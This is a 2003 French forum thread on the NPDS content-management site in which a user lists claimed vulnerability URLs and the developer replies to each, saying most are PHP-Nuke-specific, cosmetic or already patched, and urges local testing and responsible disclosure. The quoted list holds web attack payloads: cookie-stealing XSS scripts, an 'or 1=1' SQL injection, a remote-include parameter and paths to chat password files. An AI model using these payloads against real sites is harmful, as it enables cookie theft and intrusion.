logo

NPDS : Gestion de contenu et de communauté


Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
29 visiteur(s) et 0 membre(s) en ligne.
Activité du Site

Pages vues depuis 25/05/2001 : 108 404 703

  • Nb. de membres 8 693
  • Nb. d'articles 1 695
  • Nb. de forums 26
  • Nb. de sujets 8
  • Nb. de critiques 92

Top 10  Statistiques

Index du forum »»  Sécurité »» [Résolu] - les failles

[Résolu] - les failles#6128

7Contributeur(s)
developpeurgygylapelucheAnonyme[-Jarod-]axelovniAchel_Jay
3 Modérateur(s)
developpeurjpbJireck
gygylapeluche gygylapelucheicon_post
ct moi l'anonyme avant.
dsl si j'ai foutu le bordel...
demande moi si tu les veux tous....
Je suis à ta disposition....
Jai la fleme de tout retaper...
lol
:=! :=!
developpeur developpeuricon_post
Citation : "18-06-2003 17:46, Anonyme a écrit :
Ya un erreur sur le port 80
qui permet une attaque par deny de service
http://target.com/modules.php?name=Your_Account&op=userinfo&uname=
sur certain site npds, vous l'avez corrigez ?
http://www.nukesite.com/modules.php?name=News&file=article&sid=1234%20or%
201=1
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)

Et celle là ???
Ca marche pas depuis laquelle ?
Et j'avais aussi celle-ci :
http://target.com/modules.php?op=modload&name=News&file=index&catid=&topic=>
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)

Là je suis sûr de moi, le site il bug complètement quand on fait :
http://www.npds.org/forum/memberlist.php?
même sur le tiens dev.
==> cela ne fait rien en dehors de faire merder le theme graphique

http://www.npds.org/chat/!nicks.txt
http://www.npds.org/chat/!pwds.txt
==> cela ne fait rien en dehors de faire merder le theme graphique du Chat

<!script>alert(!!document.cookie!!);<!/script>
==> marche plus depuis longtemps ...

J'avais aussi celle là :
http://target/article.php?sid="><Img Src=!!javascript!!:alert(!!document.cookie!!)><Img Src="
c'est une css...
==> marche plus depuis longtemps ...

Et celle-ci sur le chat :
http://www.target.com/chat/data/usr
http://www.npds.org/user.php?caselist[bad_file.txt][path]=http://localhost
==> marche plus depuis longtemps ...

celle si qui marche bien aussi :
http://www.npds.org/forum/member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C/font%3E%3Cscript%3Ealert(%22Ruef%22);%3C/script%3E%3C/div%3E
==> Tu est certains ????
----------
gygylapeluche gygylapelucheicon_post
EN faites j'ai juste resortiles failles que j'utilisaient avant....
ya bien longtemps.
Et puis je les ai vérifier en faisant un audit, sur npds...
Dsl
Si jai fait une connerie, il n'y avait aucune mauvaise intention .
Et je ne sais, pas si c'est moi.
Mais moon audit à marché du tonerre.
Et j'avoue que je lui fait confiance avec une bonne centaine de faille
nommé à haut risque
sql injection + failles sur les !include!s...

A parament vous avez remédiez à ces problèmes...
Je vais continuer à chercher sans faire de connerie d'acc...?
Ya certainement un trou à combler quelque part...
lol
:-) :-)
[-Jarod-] [-Jarod-]icon_post
j'adore ton avatar :b
developpeur developpeuricon_post
je ne suis pas contre mais je voudrais savoir qu'elles failles marchent rééllement ? (en dehors de faire merder le theme du site).

Mais si tu met le boxon sur npds.org ne t'étonne pas de prendre un coup de baton ... / test en local, on en discute, on trouve la parade, on publis la faille et la parade : voilà comment il faut faire normallement

A suivre
gygylapeluche gygylapelucheicon_post
Pas de problème.
Je vais tout simplement faire ça sur mon site.
Si je trouve quelque chose promis, je le met en ligne.
Je vais me pencher vers les failles !include!...
:=!
axel axelicon_post
Citation : "19-06-2003 16:53, developpeur a écrit :
je ne suis pas contre mais je voudrais savoir qu'elles failles marchent rééllement ? (en dehors de faire merder le theme du site).

Mais si tu met le boxon sur npds.org ne t'étonne pas de prendre un coup de baton ... / test en local, on en discute, on trouve la parade, on publis la faille et la parade : voilà comment il faut faire normallement

A suivre"
----------
ovni ferait bien d'en prendre de la graine :-D
ovni ovniicon_post
On parle de moi ????
Ta vue j'ai compris la lecon j'ai plus fait de bêtise.
Contrairement à gygylapeluche j'ai trouvé des failles qui marche actuellement mais s'est que de l'injection html alors s'est pas trop grave.
@+
axel axelicon_post
Citation : "18-06-2003 17:48, gygylapeluche a écrit :
ct moi l'anonyme avant.
dsl si j'ai foutu le bordel...
demande moi si tu les veux tous....
Je suis à ta disposition....
Jai la fleme de tout retaper...
lol
:=! :=! "
----------
=> qu'estcequec'est qu'i a ft le vilain garcon ??
developpeur developpeuricon_post
Ovni soit pas grincheu, fini le Chat et envoie moi le .... :-D / tu est même sité dans la 5.0 pour tes recherches et découvertes alors ....
axel axelicon_post
c un honneur rare, ca

(PS : j'y suis moi ??) :#
ovni ovniicon_post
Je savais pas !!!
Merci beaucoup, je cours finir mon chat et tu la dimanche je pense.
Bye :D
developpeur developpeuricon_post
Axel : Evidemmmmmmmmmmmmmmmmmmmmmmmment
axel axelicon_post
j'en rougis...
Achel_Jay Achel_Jayicon_post
coment faire bosser les autres => une carotte mouarf :=!